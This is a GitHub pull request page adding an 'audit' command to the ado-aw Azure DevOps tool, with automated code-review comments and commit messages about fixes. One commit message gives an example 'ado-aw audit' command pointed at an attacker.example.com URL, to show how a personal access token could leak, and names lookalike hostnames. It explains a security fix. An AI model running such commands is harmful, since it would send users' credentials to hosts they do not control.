Skip to content

feat(audit): add ado-aw audit <build-id-or-url> command#691

Merged
jamesadevine merged 5 commits into
mainfrom
feat/audit-command
Jun 1, 2026
Merged

feat(audit): add ado-aw audit <build-id-or-url> command#691
jamesadevine merged 5 commits into
mainfrom
feat/audit-command

Conversation

@jamesadevine
Copy link
Copy Markdown
Collaborator

feat(audit): add ado-aw audit <build-id-or-url> command

ADO-side counterpart to gh aw audit. Single-run audit only in this MVP: download a build's artifacts, run every analyzer (firewall, MCP gateway, OTel, safe outputs, detection verdict, build timeline, missing tools/data/noops), and emit a Markdown or JSON report.

What ships

New src/audit/ module tree:

File Role
model.rs AuditData — top-level JSON contract. Drift-compatible with gh-aw's shape; adds ADO-specific detection_analysis, safe_output_execution, rejected_safe_outputs sections.
url.rs Parses bare build IDs, dev.azure.com URLs, legacy *.visualstudio.com URLs, on-prem Azure DevOps Server URLs (with optional &j=/&t=/&s= job/step anchors).
cache.rs CLI-version-keyed <output>/build-<id>/run-summary.json with atomic temp-file + rename writes.
analyzers/firewall.rs AWF Squid proxy logs → per-domain stats (allowed/denied/mixed).
analyzers/policy.rs AWF policy-manifest.json + audit.jsonl → rule hit counts.
analyzers/mcp.rs MCPG NDJSON → tool usage, server health (unreliable flagging), failures.
analyzers/otel.rs Copilot OTel + aw_info.json → metrics + engine config.
analyzers/safe_outputs.rs Joins proposals + detection verdict + execution log keyed on context.
analyzers/detection.rs threat-analysis.json → DetectionAnalysis.
analyzers/missing.rs Missing-tool / missing-data / noop NDJSON entries.
analyzers/jobs.rs ADO /timeline REST → JobData[].
findings.rs 8 heuristic rules emitting severity-rated findings + recommendations.
render/console.rs Markdown-style terminal renderer (section ordering mirrors gh-aw).
render/json.rs Stable JSON contract for tooling.
cli.rs Orchestration: URL parse → auth resolve → metadata fetch → artifact download → analyzers → findings → cache → render.

Pipeline-side runtime additions (so ado-aw audit of an existing build has the inputs it needs):

  • All four src/data/*-base.yml templates emit staging/aw_info.json at runtime (engine, model, agent name, source, target, version, build context). Generated by an extension to AdoAwMarkerExtension.
  • src/execute.rs writes per-item safe-outputs-executed.ndjson in <output-dir> so the audit can trace proposed → detection → executed per safe output.

CLI surface

ado-aw audit <build-id-or-url>
  -o, --output <dir>         # default ./logs (matches gh-aw operator muscle memory)
  --json                     # emit AuditData as JSON to stdout
  --org <url>                # ADO context overrides; auto-detected from git remote
  --project <name>
  --pat <token>              # also reads AZURE_DEVOPS_EXT_PAT
  --artifacts <agent,detection,safe-outputs>
  --no-cache

Unified rejection trace

When the aggregate THREAT_DETECTION_RESULT has any threat flag set, every proposed safe output lands in safe_output_execution[*].status = not_processed_due_to_aggregate_gate, carries the aggregate reasons[] (annotated applies_to_whole_batch: true), and exactly one severity-high KeyFinding is emitted summarizing which threat flags fired and how many proposals were dropped. A top-level rejected_safe_outputs rollup mirrors the same info for --json consumers.

The threat-analysis prompt itself is unchanged — it's identical to gh-aw's today, and per-item verdicts will be coordinated upstream rather than forked.

Dependencies

  • zip — unpack downloaded ADO PipelineArtifacts.
  • wiremock (dev only) — fake ADO REST server for the integration tests.

Tests

  • 80 new audit unit tests across model, url, cache, analyzers, findings, renderers.
  • 3 new integration tests (tests/audit_it.rs) against a fake REST server: happy path, permission-denied, cache hit.
  • Existing test suite untouched. 1740 tests pass total.

Docs

  • New docs/audit.md — accepted URL formats, flag table, output layout, AuditData shape, cache behavior, permission-failure UX, out-of-scope follow-ups.
  • docs/cli.md — new audit subcommand block.
  • README.md — one-line CLI entry.
  • AGENTS.md index — pointer to docs/audit.md under "Compiler internals & operations".
  • prompts/debug-ado-agentic-workflow.md — Step 1 first-move callout, new Step 2a-prime (run ado-aw audit --json before raw MCP timeline/log calls), AuditData top-level-key reference table, jq-diff fallback note. create-/update- prompts intentionally untouched (post-run inspection is debug-flavored).

Validation

  • cargo build
  • cargo test ✓ (1740 passed, 0 failed)
  • cargo clippy --all-targets --all-features ✓ (warnings only, all non-blocking style nits; no new errors)

Explicitly out of scope (recorded as follow-ups)

  • Diff mode (ado-aw audit <a> <b>)
  • Cross-run trends (ado-aw audit --last N)
  • --parse log.md / firewall.md renderers (Rust-native, no JS bundle)
  • Job/step-anchored audit (anchors are parsed but normalised to the parent build in this MVP)
  • MCP-exposed audit (agentic-pipelines MCP tool for in-pipeline self-audit)
  • Per-item detection verdict NDJSON (coordinated upstream with gh-aw)
  • Partial-approval gating that consumes it
  • AWF policy-manifest plumbing
  • AWF firewall token-usage.jsonl opt-in
  • audit-manifest.json build inventory

Each is recorded in the session plan under "Out-of-scope follow-ups" so they're not lost.

@github-actions
Copy link
Copy Markdown
Contributor

🔍 Rust PR Review

Summary: Well-structured feature addition with good error handling overall, but three actionable issues worth fixing before merge.


Findings

🐛 Bugs / Logic Issues

  • src/audit/analyzers/detection.rsfind_verdict_path lexicographic sort is wrong for multi-digit run IDs

    The function picks the "lexicographically last" analyzed_outputs_* directory using plain string comparison:

    match &latest_dir {
        Some((current_name, _)) if name <= *current_name => {}
        _ => latest_dir = Some((name, path)),
    }

    "analyzed_outputs_9" sorts after "analyzed_outputs_10" because '9' > '1'. In any build where both exist (e.g. a retry where ADO incremented the numeric suffix), the wrong — older — verdict would be read and the run could be mis-classified as safe.

    Fix: parse the trailing integer and compare numerically, or zero-pad during comparison:

    fn suffix_number(name: &str) -> u64 {
        name.rsplit('_').next().and_then(|s| s.parse().ok()).unwrap_or(0)
    }
    // then compare suffix_number(&name) vs suffix_number(current_name)

    The same pattern is used in safe_outputs.rs and jobs.rs (all rely on matches.sort() / lexicographic-last on directory names). All three need the same fix.


🔒 Security Concerns

  • src/ado/mod.rsADO_AW_TEST_ORG_URL override is always active in production

    apply_test_org_url_override is a #[doc(hidden)] function, but it is called unconditionally from resolve_ado_context — not gated by #[cfg(test)]. Any user or CI environment that happens to have ADO_AW_TEST_ORG_URL set (e.g. a leftover env var from a previous debugging session) will silently redirect all ADO API calls — build metadata fetches, artifact lists, pipeline updates — to an attacker-controlled URL.

    Either gate it:

    #[cfg(test)]
    fn apply_test_org_url_override(ctx: &mut AdoContext) { ... }
    #[cfg(not(test))]
    fn apply_test_org_url_override(_: &mut AdoContext) {}

    Or document the env var in docs/cli.md as a supported override so operators can reason about it. The current state (always active, hidden from docs) is the worst of both worlds.


⚠️ Suggestions

  • src/audit/analyzers/safe_outputs.rs – synchronous std::fs::read_dir called from async context

    top_level_dirs_with_prefix and collect_named_files use std::fs::read_dir (blocking), but they are called from async fn analyze_safe_outputs. On a Tokio multi-thread runtime this blocks an executor thread for the duration of the directory walk. The rest of the codebase (and the other analyzers in this PR) consistently use tokio::fs. These two helpers should be converted to async fn with tokio::fs::read_dir, or wrapped with tokio::task::spawn_blocking.


✅ What Looks Good

  • Zip extraction in ado/mod.rs correctly uses entry.enclosed_name() to reject path-traversal entries — this is the right approach and is well-tested.
  • append_execution_record swallows its own errors (logged at warn!) so audit-log failures never abort Stage 3 execution — correct design for a diagnostic side-channel.
  • cache.rs atomic temp-file + rename pattern is correct; the version-keyed cache invalidation is clean.
  • Error messages on 401/403 include the exact PAT scopes needed and a manual az pipelines fallback command — great UX.
  • 80 new unit tests + 3 integration tests against a fake REST server is solid coverage for a feature this size.

Generated by Rust PR Reviewer for issue #691 · ● 10.3M ·

jamesadevine added a commit that referenced this pull request May 21, 2026
Three issues raised by the Rust PR Reviewer on #691:

1. **Lexicographic sort wrong for multi-digit run IDs.** Previously
   `find_artifact_dir` / `find_verdict_path` / `top_level_dirs_with_prefix`
   picked the "lexicographically last" `<prefix>_<id>` directory, which
   sorts `_9` after `_10` (because `'9' > '1'`). On a build retry that
   produced both `analyzed_outputs_9` and `analyzed_outputs_10`, the
   older verdict would be read and the run could be mis-classified as
   safe.

   New `crate::audit::cmp_numeric_suffix` extracts the trailing token
   after the final `_`, parses it as `u64`, and compares numerically
   with a lexicographic tie-breaker for non-numeric suffixes. All three
   call sites now use it. Regression tests added in mod.rs, detection.rs,
   and cli.rs.

2. **Security: `ADO_AW_TEST_ORG_URL` was always active in production.**
   The override was `#[doc(hidden)]` but not gated by build mode, so a
   stray env var (debugging leftover, hostile CI environment) could
   silently redirect ADO REST calls to an attacker-controlled URL in a
   release binary.

   Gated on `cfg(debug_assertions)`: debug builds (`cargo test`,
   `cargo run`) keep the override AND emit a loud `warn!` on every
   invocation; release builds (all published artifacts via
   `cargo build --release`) replace the body with a no-op so a stray
   env var has no effect. The integration test in `tests/audit_it.rs`
   continues to work because `cargo test` builds in debug mode.

3. **Blocking `std::fs::read_dir` in async context.** `safe_outputs.rs`
   had two helpers (`top_level_dirs_with_prefix`, `collect_named_files`)
   using sync I/O from inside `async fn analyze_safe_outputs`. On a
   Tokio multi-thread runtime this blocks an executor thread for the
   duration of the directory walk.

   Both helpers converted to `async fn` using `tokio::fs::read_dir`.
   The recursive `collect_named_files` uses `Box::pin` to satisfy the
   async-recursion shape (consistent with the existing pattern in
   `crate::detect::scan_directory`).

Tests: 1745 unit tests + 3 integration tests pass (up from 1740 — 5
new regression tests for the numeric-suffix bug).

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
@github-actions
Copy link
Copy Markdown
Contributor

🔍 Rust PR Review

Summary: Looks good overall — well-structured module, solid test coverage, good error handling patterns throughout. A few specific concerns worth addressing before merge.

Findings

🐛 Bugs / Logic Issues

  • src/execute.rs:312-316is_budget_exhausted relies on brittle string matching

    fn is_budget_exhausted(result: &ExecutionResult) -> bool {
        !result.success
            && result.message.starts_with("Skipped")
            && result.message.contains("maximum ")
            && result.message.contains("already reached")
    }

    This function drives whether the audit NDJSON gets status: "budget_exhausted" vs status: "failed". It cross-checks the human-readable message generated in enforce_budget (line 616: "Skipped{}: maximum {} count ({}) already reached..."). If that message is ever rephrased — e.g. changing "maximum" to "max", adding a prefix — budget-exhausted entries silently become "failed" in every audit log with no compile-time warning.

    The right fix is to add a structural flag to ExecutionResult (e.g. budget_exhausted: bool) set in enforce_budget, and key off that in execution_record_status. This makes the intent explicit and refactor-safe.

  • src/execute.rs:320execution_record_status maps is_warning()"skipped"

    } else if result.is_warning() {
        "skipped"
    }

    is_warning() is true for tools like noop and missing-tool that succeed with a warning (no ADO credentials). These show up as status: "skipped" in the audit log, which is semantically misleading — they ran successfully, they just couldn't persist a result. "warning" or "no_op" would be more accurate and avoids confusion with the actual budget-skip case.

⚠️ Suggestions

  • src/audit/url.rs:1#![allow(dead_code)] on the whole file

    The file-level attribute silences all unused-item warnings. If this was added to suppress specific MVP-incomplete items (e.g. job_id/step_id on ParsedBuildRef which are parsed but not yet consumed), prefer targeted #[allow(dead_code)] on just those fields so future dead code in the file doesn't go undetected.

  • src/audit/cache.rsfs::rename atomicity on Windows

    The atomic temp-write + rename pattern is correct on Linux. Worth a comment noting this is intentionally Linux-only — fs::rename is not atomic on Windows when the destination file exists. Not a bug for ADO hosted agents, just a future-proofing note.

  • src/compile/extensions/ado_aw_marker.rsunwrap() in marker_json / aw_info_json

    fn aw_info_json(&self) -> String {
        serde_json::to_string(&serde_json::json!({...})).unwrap()
    }

    These are provably safe (serializing a json!({}) literal never fails), but per the project style they deserve a // infallible: serializing a static json! literal never fails comment to make that explicit.

✅ What Looks Good

  • Atomic cache writes (temp → rename → cleanup on failure) correctly implemented in cache.rs.
  • The heredoc in ado_aw_marker.rs uses a single-quoted delimiter (<<'AW_INFO_EOF') preventing ADO variable expansion in the JSON content. The 4-space YAML indentation strips cleanly to leave the terminator at column 0 after YAML processing — correct.
  • append_execution_record correctly swallows I/O errors with warn! rather than propagating — Stage 3 audit logging must never abort the actual execution.
  • Detection-gate rejection path in analyzers/safe_outputs.rs uses expect() only behind the gate_fired guard, making the invariant clear.
  • wiremock-based integration tests in tests/audit_it.rs are the right approach — no real network calls in CI.
  • EXECUTED_NDJSON_FILENAME shared via ndjson:: module rather than duplicated as string literals across execute.rs and the audit analyzers.

Generated by Rust PR Reviewer for issue #691 · ● 11.3M ·

jamesadevine and others added 2 commits June 1, 2026 22:08
Single-run audit: download a build's artifacts, run every analyzer
(firewall, MCP gateway, OTel, safe outputs, detection verdict, build
timeline, missing tools/data/noops), and emit a Markdown or JSON
report. ADO-side counterpart to `gh aw audit`.

New module tree under `src/audit/`:

- `model.rs` — `AuditData` (drift-compatible with gh-aw's top-level
  contract; adds ADO-specific `detection_analysis`,
  `safe_output_execution`, `rejected_safe_outputs` sections).
- `url.rs` — parses bare IDs, dev.azure.com URLs, legacy
  visualstudio.com URLs, and on-prem Azure DevOps Server URLs (with
  optional `&j=`/`&t=`/`&s=` job/step anchors).
- `cache.rs` — CLI-version-keyed `run-summary.json` with atomic writes.
- `analyzers/{firewall,policy,mcp,otel,safe_outputs,detection,missing,jobs}.rs`
  — eight defensive NDJSON/REST analyzers.
- `findings.rs` — eight heuristic rules emitting severity-rated
  findings + recommendations.
- `render/{console,json}.rs` — two renderers; JSON shape is the
  public contract.
- `cli.rs` — orchestration: URL parse → auth → metadata fetch →
  artifact download → analyzers → findings → cache → render.

Unified rejection trace: when the aggregate `THREAT_DETECTION_RESULT`
has any threat flag set, every proposal lands in
`not_processed_due_to_aggregate_gate` carrying the aggregate
`reasons[]`, exactly one severity-`high` `KeyFinding` is emitted, and a
`rejected_safe_outputs` rollup appears at the top level.

Pipeline-side runtime additions (so an `ado-aw audit` of an existing
build has the data it needs):

- `src/data/*-base.yml` (via `AdoAwMarkerExtension`): emits
  `staging/aw_info.json` at runtime with engine, model, agent name,
  source path, target, compiler version, and ADO build context.
- `src/execute.rs`: writes a per-item `safe-outputs-executed.ndjson`
  in `<output-dir>` so the audit can show the proposed → detection →
  executed trace.

CLI surface:

    ado-aw audit <build-id-or-url>
      -o, --output <dir>     # default ./logs
      --json
      --org / --project / --pat
      --artifacts <agent,detection,safe-outputs>
      --no-cache

New dependencies: `zip` (artifact unpack), `wiremock` (dev only —
integration test mock server).

Tests: 80 new audit unit tests + 3 integration tests against a fake
ADO REST server (happy path, permission-denied, cache hit) using a
thin `ADO_AW_TEST_ORG_URL` test seam. 1740 total tests pass.

Docs: new `docs/audit.md`; updates to `docs/cli.md`, `README.md`,
`AGENTS.md` index, and `prompts/debug-ado-agentic-workflow.md` (Step 1
first-move + new Step 2a-prime + `AuditData` reference + jq-diff
fallback).

Out of scope (explicit follow-ups): diff mode, cross-run trends,
`--parse` log.md/firewall.md, job/step-anchored audit, MCP-exposed
audit, per-item detection verdict (upstream coordination with gh-aw),
partial-approval gating, AWF policy-manifest plumbing, AWF
token-usage.jsonl, `audit-manifest.json` build inventory.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
Three issues raised by the Rust PR Reviewer on #691:

1. **Lexicographic sort wrong for multi-digit run IDs.** Previously
   `find_artifact_dir` / `find_verdict_path` / `top_level_dirs_with_prefix`
   picked the "lexicographically last" `<prefix>_<id>` directory, which
   sorts `_9` after `_10` (because `'9' > '1'`). On a build retry that
   produced both `analyzed_outputs_9` and `analyzed_outputs_10`, the
   older verdict would be read and the run could be mis-classified as
   safe.

   New `crate::audit::cmp_numeric_suffix` extracts the trailing token
   after the final `_`, parses it as `u64`, and compares numerically
   with a lexicographic tie-breaker for non-numeric suffixes. All three
   call sites now use it. Regression tests added in mod.rs, detection.rs,
   and cli.rs.

2. **Security: `ADO_AW_TEST_ORG_URL` was always active in production.**
   The override was `#[doc(hidden)]` but not gated by build mode, so a
   stray env var (debugging leftover, hostile CI environment) could
   silently redirect ADO REST calls to an attacker-controlled URL in a
   release binary.

   Gated on `cfg(debug_assertions)`: debug builds (`cargo test`,
   `cargo run`) keep the override AND emit a loud `warn!` on every
   invocation; release builds (all published artifacts via
   `cargo build --release`) replace the body with a no-op so a stray
   env var has no effect. The integration test in `tests/audit_it.rs`
   continues to work because `cargo test` builds in debug mode.

3. **Blocking `std::fs::read_dir` in async context.** `safe_outputs.rs`
   had two helpers (`top_level_dirs_with_prefix`, `collect_named_files`)
   using sync I/O from inside `async fn analyze_safe_outputs`. On a
   Tokio multi-thread runtime this blocks an executor thread for the
   duration of the directory walk.

   Both helpers converted to `async fn` using `tokio::fs::read_dir`.
   The recursive `collect_named_files` uses `Box::pin` to satisfy the
   async-recursion shape (consistent with the existing pattern in
   `crate::detect::scan_directory`).

Tests: 1745 unit tests + 3 integration tests pass (up from 1740 — 5
new regression tests for the numeric-suffix bug).

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
Two issues in src/execute.rs that made the executed-NDJSON manifest
silently mis-classify entries:

1. is_budget_exhausted parsed the human-readable message
   ("Skipped...maximum...already reached"). Any phrasing tweak to
   check_budget would have silently downgraded budget-exhausted
   records to status: "failed" in every audit log, with no
   compile-time signal.

2. is_warning() entries (e.g. noop / missing-tool that succeeded
   without ADO credentials) were emitted as status: "skipped",
   conflating successful-but-no-op runs with the rejection bucket
   used by the audit rollup.

Fixes:

- Add ExecutionResult.budget_exhausted: bool with budget_exhausted()
  constructor and is_budget_exhausted() accessor. check_budget now
  emits a structurally-tagged result; execution_record_status keys
  off the flag. Refactor-safe.
- Map warning results to status: "warning" (distinct from "skipped").
  Add SafeOutputStatus::Warning; counted toward executed_count, never
  toward rejected_by_execution_count or the rejection rollup.
- Update affected unit tests; add coverage for budget_exhausted
  serialization round-trip and warning-status analyzer mapping.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
@github-actions
Copy link
Copy Markdown
Contributor

github-actions Bot commented Jun 1, 2026

🔍 Rust PR Review

Summary: Looks good overall — the audit module is well-structured, error handling is solid, and security-sensitive paths (zip extraction, cache writes) are handled correctly. Three issues worth addressing before merge.


Findings

🐛 Bugs / Logic Issues

  • src/ado/mod.rs:462artifact.name from the ADO REST response is used directly as a path component with no sanitisation:
    let artifact_dir = dest_dir.join(&artifact.name);
    If a server (or a compromised build) returned an artifact whose name field contains .. or an absolute path, the subsequent remove_dir_all + create_dir_all calls would operate outside dest_dir. The zip entries themselves are correctly guarded with enclosed_name() (good catch), but the artifact directory is not. A simple fix: check the name contains no path separator or leading / before joining, or use Path::new(&artifact.name).file_name() to reject anything with a parent component.

🔒 Security Concerns

  • src/ado/mod.rs:483-494auth is accepted as a parameter to download_build_artifact but the actual download request (client.get(download_url).send()) does not call auth.apply(). The only reference to auth is let _ = auth; inside the error branch to suppress the unused-variable warning. If the intent is that download_url is always a pre-signed/SAS URL and auth is intentionally omitted, a one-line comment would clarify this and prevent a future contributor from "fixing" it by adding auth.apply() to a signed URL unnecessarily. If it was an accidental omission and the URL is not pre-signed, this is a silent auth bypass on every download.

⚠️ Suggestions


✅ What Looks Good

  • Zip path traversal is handled correctly: entry.enclosed_name() rejects ../ components before constructing output_path.
  • Atomic cache writes via temp-file + rename in cache.rs prevent partial/corrupt reads.
  • apply_test_org_url_override being #[cfg(debug_assertions)]-only is a clean way to keep the test hook out of release builds.
  • Soft analyzer failures throughout cli.rs — individual analyzer errors are warned and recorded without aborting the full audit run.
  • load_run_summary version-keying transparently invalidates stale caches across ado-aw upgrades without requiring explicit migration code.

Generated by Rust PR Reviewer for issue #691 · sonnet46 2M ·

jamesadevine and others added 2 commits June 1, 2026 22:31
…xfil

Two issues surfaced by the adversarial review:

1. download_build_artifact discarded its �uth argument
   src/ado/mod.rs::download_build_artifact took &AdoAuth but called
   client.get(download_url).send() with no �uth.apply(...) wrapper,
   silenced by let _ = auth;. For ADO artifact resource types whose
   downloadUrl is not pre-signed (legacy/Container artifacts and many
   on-prem ADO Server topologies) the request returned 401/403, and the
   401 branch then misleadingly told the user to check their PAT scopes
   — which had never been sent. Fix: wrap with �uth.apply(...) to
   match list_build_artifacts / get_build. Pre-signed Artifact Services
   URLs continue to work because they ignore the Authorization header in
   favor of their sig= query string.

2. �udit <URL> sent the local PAT to any host in the URL
   src/audit/url.rs accepted on-prem URLs with an arbitrary host;
   apply_parsed_context_overrides plumbed that host straight into
   ctx.org_url; and AdoAuth::apply then attached the PAT via HTTP Basic
   Auth — to whatever host the URL named. A user social-engineered into
   running �do-aw audit https://attacker.example.com/Coll/Proj/_build/results?buildId=1
   would silently exfiltrate their PAT.

   Fix: validate_audit_url_host() now runs before any auth-bearing
   request. Microsoft-managed cloud hosts (dev.azure.com,
   *.visualstudio.com) are always trusted. Any other host must match the
   host in the trusted ADO context, which is itself resolved from --org
   or the local git remote — both explicit, locally controlled trust
   anchors. The check is host-suffix anchored (rejects .visualstudio.com
   bare-suffix and �isualstudio.com.attacker.example lookalikes) and
   case-insensitive.

   Adds 11 unit tests covering: cloud-host allowlist (positive and
   case-insensitive), bare-suffix / lookalike rejection,
   trusted-context match, trusted-context mismatch, no-trusted-context
   fallback, and host extraction edge cases.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
Follow-up to ea9c032. The previous fix derived the trusted host from
resolve_ado_context(), which requires BOTH --org AND --project when
running outside a git repo. That created a UX regression: when a user
ran �do-aw audit https://onprem.example.com/coll/proj/_build/results?buildId=42
from an arbitrary folder with --org https://onprem.example.com/coll,
the trust anchor still came back as None (because --project wasn't
passed), and validate_audit_url_host then rejected the URL host telling
the user to "pass --org" — which they already had.

Fix: introduce resolve_trusted_host(cwd, org_flag) that derives a host
from --org if provided (any form normalize_org_url accepts), else from
the git remote of cwd, else None. validate_audit_url_host now takes
Option<&str> directly. Full-context resolution still runs afterward for
its original purpose (supplying defaults the URL overrides supersede).

Adds 4 regression tests, including one for the original failure mode:
running in an arbitrary folder with --org alone (no --project) must
yield a usable trust anchor.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
@jamesadevine jamesadevine merged commit 5c33e40 into main Jun 1, 2026
3 checks passed
@jamesadevine jamesadevine deleted the feat/audit-command branch June 1, 2026 21:36
@github-actions
Copy link
Copy Markdown
Contributor

github-actions Bot commented Jun 1, 2026

🔍 Rust PR Review

Summary: Looks good overall — well-structured feature with solid error handling and test coverage. One correctness concern worth addressing before this pattern is widely deployed.

Findings

🐛 Bugs / Logic Issues

  • src/compile/extensions/ado_aw_marker.rs — ADO macro values in aw_info.json bypass JSON escaping

    aw_info_json() embeds ADO runtime macros ($(Build.SourceBranch), $(Build.SourceVersion), $(Build.BuildId), $(System.DefinitionId)) as raw literal strings inside a serde_json::json!({}) call. Those strings are emitted verbatim into the JSON that becomes the heredoc body. ADO expands them before bash runs — but that expansion is a raw text substitution with no JSON escaping. If $(Build.SourceBranch) ever expands to a value containing " or \ (e.g. a ref on an on-prem server that permits backslashes), the written aw_info.json would be malformed and the otel analyzer would silently fail to parse it.

    For $(Build.BuildId) (numeric) and $(Build.SourceVersion) (hex SHA) this is zero risk in practice. For $(Build.SourceBranch) it is low but non-zero. One fix: drop the four ADO-macro fields from the compile-time JSON and append them at bash runtime using the environment variables ADO sets ($BUILD_BUILDID, $BUILD_SOURCEVERSION, $BUILD_SOURCEBRANCH, $SYSTEM_DEFINITIONID), e.g. via jq or a printf approach, so the values are properly JSON-escaped before writing.

⚠️ Suggestions

  • src/audit/url.rs — file-level #[allow(dead_code)] suppresses warnings for the whole module. A blanket allow hides future drift; prefer per-item annotations or rely on pub visibility to drive the lint.

  • src/execute.rserror field populated for warningsappend_execution_record_impl writes result.message into the error field for warning-status records (e.g. noop, missing-tool). The audit-side map_execution_status correctly classifies these as SafeOutputStatus::Warning, but raw NDJSON consumers see a populated error for a non-error outcome. Consider only setting error when status is not succeeded and not warning.

✅ What Looks Good

  • Atomic cache writes in cache.rs (temp-file + rename) are correct and prevent partial reads.
  • Error swallowing in append_execution_record is intentional and well-documented — audit logging must never break Stage 3 execution.
  • build_execution_items matching uses a FIFO VecDeque keyed on (name, context) with an index-based fallback for context-free proposals — handles the common cases cleanly.
  • budget_exhausted structural flag on ExecutionResult is the right call; avoids fragile message-string parsing in the audit path.
  • Error handling throughout uses anyhow with .context() chains consistently — no naked unwrap() on user-facing paths.

Generated by Rust PR Reviewer for issue #691 · sonnet46 2.3M ·

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant